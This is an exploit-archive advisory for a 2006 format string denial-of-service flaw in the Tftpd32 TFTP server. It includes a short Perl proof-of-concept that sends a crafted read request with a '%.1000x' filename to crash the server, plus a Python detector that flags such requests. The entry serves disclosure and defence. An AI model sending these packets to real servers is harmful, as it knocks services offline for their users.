Vendor: Tftpd32
By: Critical Security research
CVSS: 7.5 (HIGH)
Format String Vulnerability
CWE: 134
Product Name: Tftpd32
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Tftpd32 Format String PoC DoS

This exploit is a proof-of-concept denial of service attack against Tftpd32. It sends a specially crafted packet containing a format string to the server, which causes the server to crash.

Mitigation:

Upgrade to the latest version of Tftpd32, or apply the patch provided by the vendor.

Exploit-DB raw data:

#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
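$bzz = "\x00\x01" ;   # opcode 1: RRQ (read request)
$bzz .= "%.1000x\x00"; # filename field holding the format specifier, NUL-terminated
$bzz .= "\x6F\x63\x74\x65\x74\x00"; # transfer mode "octet", NUL-terminated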
$tftpudp->send($bzz);

# milw0rm.com [2006-01-19]
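
A defender-side check for the request the PoC builds, added here as an example (it is not part of the original entry or of Tftpd32): it parses a UDP payload as a TFTP RRQ/WRQ and flags printf-style specifiers in the filename or mode field. The function name, the regular expression and the sample payloads are assumptions made for illustration.

```python
import re
import struct

# TFTP opcodes whose body is "filename NUL mode NUL" (RFC 1350).
REQUEST_OPCODES = {1: "RRQ", 2: "WRQ"}
KNOWN_MODES = {b"netascii", b"octet", b"mail"}

# printf-style conversion: % [flags] [width] [.precision] [length] conversion
FORMAT_SPEC = re.compile(
    rb"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|j|z|t)?[diouxXeEfgGaAcspn]"
)


def inspect_tftp_request(payload):
    """Return a list of findings for one UDP payload addressed to a TFTP server."""
    if len(payload) < 2:
        return ["truncated packet"]
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in REQUEST_OPCODES:
        return []  # DATA/ACK/ERROR carry no filename or mode string
    fields = payload[2:].split(b"\x00")
    # A well-formed request ends with NUL, so the split ends with an empty element.
    if len(fields) < 3 or fields[-1] != b"":
        return ["request fields not NUL-terminated"]
    filename, mode = fields[0], fields[1]
    findings = []
    for label, value in (("filename", filename), ("mode", mode)):
        match = FORMAT_SPEC.search(value)
        if match:
            spec = match.group().decode("ascii")
            findings.append(f"format specifier in {label}: {spec}")
    if mode.lower() not in KNOWN_MODES:
        findings.append("unknown transfer mode")
    return findings


# Constructed sample payloads: the request layout used by the PoC above,
# and an ordinary read request for comparison.
POC_REQUEST = b"\x00\x01" + b"%.1000x\x00" + b"octet\x00"
BENIGN_REQUEST = b"\x00\x01" + b"pxelinux.0\x00" + b"octet\x00"

if __name__ == "__main__":
    for name, pkt in (("poc", POC_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, inspect_tftp_request(pkt))
```

The same check can sit in front of a packet capture or a UDP proxy to log or drop such requests while an unpatched server is still in service.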